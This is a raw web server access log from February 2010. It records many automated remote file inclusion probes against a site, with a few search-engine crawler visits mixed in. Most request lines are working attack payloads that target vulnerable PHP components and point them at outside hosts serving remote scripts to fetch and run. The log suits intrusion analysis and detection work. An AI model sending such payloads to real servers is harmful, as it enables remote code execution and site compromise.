200.93.147.154 - - [13/Feb/2010:07:22:08 -0800] "GET /port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:22:11 -0800] "GET /logs/port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:22:21 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:22:21 -0800] "GET /logs/access.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:22:21 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:22:24 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:22:24 -0800] "GET /logs/access.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:22:24 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:22:38 -0800] "GET /logs/access_100109.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:22:41 -0800] "GET /logs/access_100109.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:23:14 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:23:14 -0800] "GET /logs/access.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:23:14 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:23:24 -0800] "GET /logs/access_100112.log%20%20/port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:24:00 -0800] "GET /logs/access_100109.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:24:16 -0800] "GET /logs/access.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:24:16 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:24:16 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:24:31 -0800] "GET /logs/access.log%20%20///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:24:31 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:24:31 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:24:43 -0800] "GET /logs/access_100109.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:24:46 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:24:57 -0800] "GET /logs/access_100109.log%20%20///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:25:28 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:27:26 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:27:26 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:27:26 -0800] "GET /logs/access.log%20%20///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:27:47 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:27:47 -0800] "GET /logs/access_100129.log//index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:27:48 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:27:56 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:07:27:56 -0800] "GET /logs/access.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:28:34 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:28:34 -0800] "GET /logs/access_100129.log//index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:28:34 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:28:41 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:28:41 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:28:41 -0800] "GET /logs/access.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:29:09 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:29:10 -0800] "GET /logs/access_100109.log%20%20///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:29:24 -0800] "GET /logs/access_100109.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:30:53 -0800] "GET /logs/access_100129.log%20%20//index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:30:55 -0800] "GET /logs/access.log%20%20//index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:31:15 -0800] "GET /logs/access_100202.log%20%20///write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:31:16 -0800] "GET //write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:31:16 -0800] "GET /logs///write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:31:20 -0800] "GET /logs/access_100128.log%20%20///write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:32:59 -0800] "GET /logs/access.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:07:32:59 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:33:33 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:33:33 -0800] "GET /logs/access_100120.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:33:33 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.167.62.166 - - [13/Feb/2010:07:33:41 -0800] "GET /login/needregister.php HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [13/Feb/2010:07:33:43 -0800] "GET /login/needregister.php HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:34:01 -0800] "GET /logs/access_100129.log%20%20//index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:07:34:09 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:07:34:09 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:07:34:09 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:34:14 -0800] "GET /logs/access.log%20%20//index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:34:23 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:34:41 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:34:41 -0800] "GET /logs/access_100123.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:34:41 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:34:43 -0800] "GET /logs/access_100123.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:34:43 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:34:43 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:34:55 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:34:55 -0800] "GET /logs/access.log///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:07:35:19 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:07:35:19 -0800] "GET /logs/access_100107.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:07:35:19 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.167.62.166 - - [13/Feb/2010:07:35:49 -0800] "GET /login/registerError.php HTTP/1.1" 200 6034 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [13/Feb/2010:07:35:52 -0800] "GET /login/registerError.php HTTP/1.1" 200 6034 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:37:26 -0800] "GET /logs/access_100129.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [13/Feb/2010:07:37:33 -0800] "GET /logs/access_091210.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:37:39 -0800] "GET /logs/access_100129.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:07:38:13 -0800] "GET /logs/access_100129.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:07:38:13 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:07:38:13 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:07:38:27 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:39:11 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:39:11 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:39:11 -0800] "GET /logs/access_100126.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:39:22 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:39:22 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:39:22 -0800] "GET /logs/access_100124.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [13/Feb/2010:07:39:23 -0800] "GET /module/view.php HTTP/1.0" 200 2548 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
210.205.6.233 - - [13/Feb/2010:07:39:23 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:39:23 -0800] "GET /logs/access_100126.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:39:24 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [13/Feb/2010:07:39:24 -0800] "GET /style/default_style.css HTTP/1.0" 200 1982 "http://puaga.com/module/view.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [13/Feb/2010:07:39:25 -0800] "GET /themes/retro.css HTTP/1.0" 404 5258 "http://puaga.com/module/view.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
210.205.6.233 - - [13/Feb/2010:07:39:34 -0800] "GET /logs/access_100126.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:39:34 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:39:34 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:39:54 -0800] "GET /logs/access_100109.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:42:27 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:42:27 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:42:39 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:42:40 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:42:40 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:42:42 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:42:42 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:42:42 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:42:46 -0800] "GET /logs/access_100114.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:42:49 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:42:49 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:42:49 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:42:50 -0800] "GET /logs/access_100104.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:42:52 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:42:52 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:42:52 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:43:01 -0800] "GET /logs/access_100104.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:07:43:07 -0800] "GET /logs/access_100112.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:07:43:07 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:07:43:07 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:43:08 -0800] "GET /logs/access_100104.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
